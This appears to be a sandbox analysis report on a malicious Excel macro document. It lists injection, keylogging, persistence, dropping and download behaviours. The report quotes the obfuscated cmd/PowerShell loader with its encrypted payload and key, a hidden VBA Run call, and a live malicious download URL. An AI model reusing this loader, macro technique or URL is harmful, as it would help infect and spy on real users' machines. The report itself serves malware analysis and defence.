|
|
5/5
|
Injection
|
Writes into the memory of another running process
|
-
|
|
|
-
"c:\users\public\229393.exe" modifies memory of "c:\windows\system32\svchost.exe"
|
|
|
-
"c:\windows\system32\svchost.exe" modifies memory of "c:\windows\explorer.exe"
|
|
|
5/5
|
Injection
|
Modifies control flow of another process
|
-
|
|
|
-
"c:\users\public\229393.exe" alters context of "c:\windows\system32\svchost.exe"
|
|
|
-
"c:\windows\system32\svchost.exe" alters context of "c:\windows\explorer.exe"
|
|
|
-
"c:\windows\system32\svchost.exe" creates thread in "c:\windows\explorer.exe"
|
|
|
4/5
|
Process
|
Creates process
|
-
|
|
|
-
Creates process "Cmd uokQarPiXkRo TulEVCqHjGVGZiAowD qTzHstoNw & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %XGUfViTjCEjwSVO%=ZHGHTLTuB&&set %DAXAIPvZQicL%=p&&set %vwiYoBzE%=o^w&&set %NwmclOIWlPPfrXs%=YtuPEnjH&&set %mESEbjHwWp%=!%DAXAIPvZQicL%!&&set %zkOiRaLmZdHljEQ%=XajFzihkNzuSY&&set %YJwaSiYTQtqK%=e^r&&set %pflmiDDErkSdkk%=!%vwiYoBzE%!&&set %fTvSPumjwc%=s&&set %iwaQfiAAaFLEdGO%=GdUcFsiGa&&set %iwpiikIEcScOE%=he&&set %zRBwSiVAaTKc%=ll&&!%mESEbjHwWp%!!%pflmiDDErkSdkk%!!%YJwaSiYTQtqK%!!%fTvSPumjwc%!!%iwpiikIEcScOE%!!%zRBwSiVAaTKc%! "inVOKE-EXPResSION(([runtiMe.InTeRoPSErVIceS.MArsHAl]::PtRtOsTRiNgbstr([runtimE.INtEROPSerVIcEs.MarsHAl]::seCuRestRiNgTobstR($('76492d1116743f0423413b16050a5345MgB8AG0AdABWAHUAYwA1AFUAWQB2ADgAZgBOAGUASgBHAE4AegAwAFUATQBnAEEAPQA9AHwAYgAyAGIANQBiADgAMABkADMAYQBjAGIAYQA2ADgAOQAxADEAMAA4AGEAZQBjADEAZQBmADkANgAwADUAOQBjAGQANwA1AGYAOAA1ADIAMgAzAGYAMABlAGQAOQA2ADcAZgA1ADEAMAAzADQAZAA0ADAAZgBlADQANAA4ADAANAA1AGIAZQAxADMAMQAwAGYAMgA0ADgAZQA4ADUAZgAxADIAOAAyAGMAOQAwADkANAAzADUANgBlAGEAYwAzADIAOQBhADIANgAxAGEAOQBjAGYANQAyAGUAOABiAGIANQBiADkAMwA3AGYAYQA4ADkAOQBmADYAOAA2AGIANwBiADQAYwA1AGIAOQBiADQAMQA5AGUAZQAwADgAYgAzADEANQA1ADEAZQA3ADkAZABkADQAMQAzADgAZQBhADAAMgA2AGQAZABhADEAOABkAGIAMQBiADEAOABhAGEAMAA2AGIAYwA2AGIAMwA3AGQAZgA4AGYAOQAzAGIANwBjADIAMgAyAGMAOABlADIAMgAyAGUAOAA0AGYAYwBjADMAYwA3ADAAZQAxADUAYQA4ADAAMQBhADIAMwA0ADYAYwBmAGMAYwBjAGQAMwBmADgAMQBiAGYAZABkADAAMwBmADgANwBmAGIANABlADkANQBhADcAMQA0ADQAZAA5ADcANQAzAGQANQBiAGMAOAAyAGEAYwAwADAAMwA5ADcAYwA2AGMANAAwADIAZAAzADEAYQAxADcAYQAyADQAYgBlADQAZQA4ADcAZQBmAGMAYgBiADcAMAAzAGUANAA1ADMAZgBjADAAZQAwAGEAZQAxAGEAOAA1ADEAYgA4AGUAMABhADQAOAA1AGMANgA1AGUAZAA2ADUAMwAzAGUAOQAwADMAYgA2ADMAZQBlAGQAZQA2ADEANQAwADkAZgBmAGQANgA3ADQANAA2AGEAMAA3AGQAZgBjADMAZAA1AGIAYgA1ADkAZgBjAGMAYgBlADgAOAAxAGUAOQBiAGEAZgBiADQAYwBiADEAOQA3ADcAYQBhAGMAZgBlAGQAMAA5AGUAYQAxAGYAMQAyAGIANwAwADEAMABiAGYAMwA1ADQAMQBiAGMAOQBiADIAZQA5AGIANABkADYAZAA5ADYAZgA3ADYAYgA1ADQAMQBlADQANQBmADYAMQA0ADcANQBlADEAZQBiADgAMwA3AGQANgA0ADUAZgAyADUAMwA1ADAAYQA1AGIANgA5ADUANwAyAGQAZQA0AGIAYwA1AGYAYQBiADIANwBmADgAMABmADkAOABiAGMANQA4ADcANABkAGEANgAzAGUAMwBhADgAMQAzADEANwBkADkAOABjADAAZQA1ADUAYQA2ADIAYwAxADAANQBjADUAZgBhADkAZAA3AGEANgA4ADcAMQA2ADgAYwBmAGEAMgBkADkAYgA4AGIAYgAyAGQAOAA0ADQAZQAyADYAMAA3AGEAMQAyADQAMABmADMAYgBhAGMAZABjAGIAYwBhAGEANwBjADkAOQA3ADYANQBhADUAYgBjADMANwBkADQAZgBiADkAMgBkAGIAMAAzADkANAAzADUANwAxADgAZgAwADMAOAAxAGYAMwBjADcAYQA5ADAAMAA5ADAAMgAyAGEAZAAwAGUAOAA2ADMANwBlAGQAYQA1ADcAOABmAGEANwA2ADkANgAxADQAYgBlAGQAYQAzADIAZgA5AGUAMgA0ADIAMQA2ADgAMwBjADgANQA1ADkAOQAxADIANgA5ADYAMwA2ADgAYgA1ADAAOQBhADYANABhADYAMQBiADkAMgA5AGQAYgBjADkAYwBhADkANgA5ADcAMAAzAGMANQBhADIAMAA5AGEAYwBiADYAZAAyADUAZQAxADcAMABjAGEANgBkAGYAYwBkADAAYwBhAGUAMABjAGQAYgAzAGQAZABjAGYAZAA2AGYANQAxADQAYQA0AGYANAAyAGYAYQAxADEANgBkADQAYwA0ADgAOABmAGQAOAAwAGEAZgA3AGUAOAAxADIAYgBiAGMAMwA2ADQAMABkADAAMQAyAGIAZABhADgAYQBmADIANAAyADMAOABjAGUANAAyADMAYQBjAGYANgA0AGEAYwBjAGIAMwAxAGUANQBmADEANwBmAGQAYQBmAGIAZgBiADcAYwAxADUAYwBiAGUAMABmADkANwBiADIAOQAyAGIAYwAxAGMAYgAwADEAMgA5ADMAYQBhAGIANwA4AGYAYQA5ADEAMQBiADkAYwBiAGQAYQAwAGMAMwBkAGQAZABmADkAOQA2ADMAMQBmADYAYwA5ADQANgBkAGEANgBlAGIAYQBmADQAMQAzADIAMwA4AGMANQA1AGYAMgAzAGYAZAAxADIAYQAzAGYAMAA3AGIAOABkAGYANwA5ADkAZgAyADUAMwAxAGIAOQA3ADYANQA1AGIANABlAGIAMAA3ADMAMwBmAGYANwA0AGYAOQBlADgAZQBkAGQANgA2ADcAOABmADcAZABmADYAYgAzADIAMwA0ADEAMQA4ADkAYwBmADMAZQBmADIANQAwADYAYwAyAGUAZgA4AGQAOQBhADcAMAA0ADkANwBmAGIANQBjADUANwAzADMAZgBlADcAZAAyAGMAMQBhADgANgA0ADgAZQBmAGMAYQAzADQAMwBkADUAMgA5AGYANwA5AGUANQAwADkAZQA5ADIAZQAyADMAMQAyADkANQA2AGEAZABhADQAZAAyADIAZAAxAGUAOAAzAGQANwBlAGMAZgA0ADMANQA4AGUAZgBjAGMANAA2ADcAYgA5ADYAOQAyAGYAMgAxAGIAOQA2ADkAOQA3ADYAZgAwADUAZgBhAGUANABiADgANQA4ADQAMgA0ADMAMABmAGIAZAA4ADAANgAzAGUAOAAxAGYAYgA3AGUAMQA4AGUANgA5ADEAZgBiADUAYQA1AGMAOABjADAAMwBjAGIAOQA4ADUANABlADkAOAA2ADMAZgBjAGMAYwBkAGEAYwA0ADMAZAA2ADMAZQAyADcAYwAyAGIANABlAGEAMQBlAGMANwAyADkAOABjADcAYwAxADUAZgAxADYANgBkADkAYwA1AGMAYgBiADkAOQBjAGQAYwA2AGIANgBhADQAYwA1ADMAMQAzAGUAMAAzAGEAYQA3AGEANgA2AGUAZQBmADMAYQBmADUANwA0ADUAZgA1ADMAMAAwADUAZAA4ADQAOQA0AGMAYwBlADQAYgA1ADQANAA0AGEAMQA1ADMAOQBiADUAZAA5ADQAMQBlAGUANwAyAGUAOQA3ADQANQBiAGEANwA4ADcANQAzADMANwA1ADMAYQBmAGQAYwBiADMAYwA2AGMAOAAxAGMAYwA5AGUAOAAwAGMAZQBmAGEANgA3AGIAMQAyAGEAMQA5AGEANwA2AGIAMwA4AGUAMgA1AGYANQBmADgAZAA2ADcANgBkAGQAMAA0ADMAMAA3ADkAOAA3ADQAMwAzADAAYgAwADgAZgBhADQAMgAyADcAZgAwADIAYgA2ADgAOAA1ADgAZAA2AGEAYQAyAGIAOABiADMANAAzAGIAOQA1ADAAMAAyAGQANQBiADAAMgBkADUAYgA3ADcAZQAxADIAOQAwADcANwAwAGUAMgBiADcANAAxAGYAZgA3ADkAMwBjADEAOAAxADEAOQA3AGMAZgBiADIANgA4ADEAZgBkADIAOABmADcAZQA3ADUAOAA5AGQAYwA3ADUAZAAzADAAOQBhAGIANwBmAGIAMQBlAGIAZgAxADEAYQBiADMAZQAxAGUAMAA4ADEANwA2ADAAOQAyAGIAMwBlADAAMABhADIAOQBiADUAYgBhADkAYwA0AGUAOQA0ADcAZgAzADYAZQAyADAAYwBkADEAMgA4ADIAMABlAGMAZgAzADIANwBkAGIAOQBjADYAYwA5ADQAYwAzADIAMgBkADcAZgA2AGEAMgA4ADEAOAAyADIAZAA0ADMAMgBmADUAMABlADkAYwAwAGUANwBjAGIANwAwAGMAYgAzAGMAZQBiAGQAYgBiAGUAYwA3ADQANwA3ADIAMwAzADUA' | CoNveRTto-seCURestrING -Ke (222..207)) ) ))) ".
|
|
|
-
Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
|
|
|
-
Creates process "C:\Users\Public\229393.exe".
|
|
|
-
Creates process "C:\Windows\system32\svchost.exe".
|
|
|
4/5
|
Process
|
Reads from memory of another process
|
-
|
|
|
-
"c:\windows\system32\svchost.exe" reads from "c:\windows\explorer.exe".
|
|
|
4/5
|
Device
|
Monitors keyboard input
|
Keylogger
|
|
|
-
Installs system wide "WH_KEYBOARD_LL" hook(s) to monitor keystrokes.
|
|
|
4/5
|
Process
|
Executes encoded PowerShell script
|
-
|
|
|
-
Executes encoded PowerShell script to possibly hide malicious payload.
|
|
|
4/5
|
Network
|
Downloads data
|
Downloader
|
|
|
-
URL "ihbnaoisdnasdasd.com/NOIT/testv.php?l=krish7.class".
|
|
|
3/5
|
Network
|
Performs DNS request
|
-
|
|
|
-
Resolves host name "ihbnaoisdnasdasd.com".
|
|
|
3/5
|
Persistence
|
Installs system startup script or application
|
-
|
|
|
-
Adds "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe" to Windows startup via registry.
|
|
|
3/5
|
PE
|
Executes dropped PE file
|
-
|
|
|
-
Executes dropped file "c:\users\public\229393.exe".
|
|
|
2/5
|
Network
|
Associated with known malicious/suspicious URLs
|
-
|
|
|
-
URL "ihbnaoisdnasdasd.com/NOIT/testv.php?l=krish7.class" is known as malicious URL.
|
|
|
2/5
|
Network
|
Connects to HTTP server
|
-
|
|
|
-
URL "ihbnaoisdnasdasd.com/NOIT/testv.php?l=krish7.class".
|
|
|
2/5
|
PE
|
Drops PE file
|
Dropper
|
|
|
-
Drops file "c:\users\public\229393.exe".
|
|
|
2/5
|
VBA Macro
|
Creates suspicious COM object
|
-
|
|
|
-
CreateObject(AhwlacHHm).Run UDMwkLKaOX + Chr(VBA.vbKeyC) + fTvSPumjwc + Ywiazs + BRlkdR, vbHide
|
|
|
1/5
|
Process
|
Creates system object
|
-
|
|
|
-
Creates mutex with name "Global\.net clr networking".
|
|
|
-
Creates mutex with name "{B29A7695-69BA-B440-8306-AD28679A31DC}".
|
|
|
-
Creates mutex with name "{BE6B9E68-0520-A091-7FD2-09D423264D48}".
|
|
|
-
Creates mutex with name "Local\{722AD44B-2987-7426-43C6-6DE8275AF19C}".
|
|
|
-
Creates mutex with name "Local\{FCF9E212-2B0D-8EC0-95F0-8FA2992433F6}".
|
|
|
-
Creates mutex with name "Local\{6A5E21FF-C1FA-2C95-9B3E-8520FF528954}".
|
|
|
1/5
|
Process
|
Overwrites code
|
-
|
|
|
-
Overwrites code to possibly hide behavior.
|
|
|
1/5
|
VBA Macro
|
Executes macro on specific worksheet event
|
-
|
|
|
-
Executes macro on "Activate Workbook" event.
|
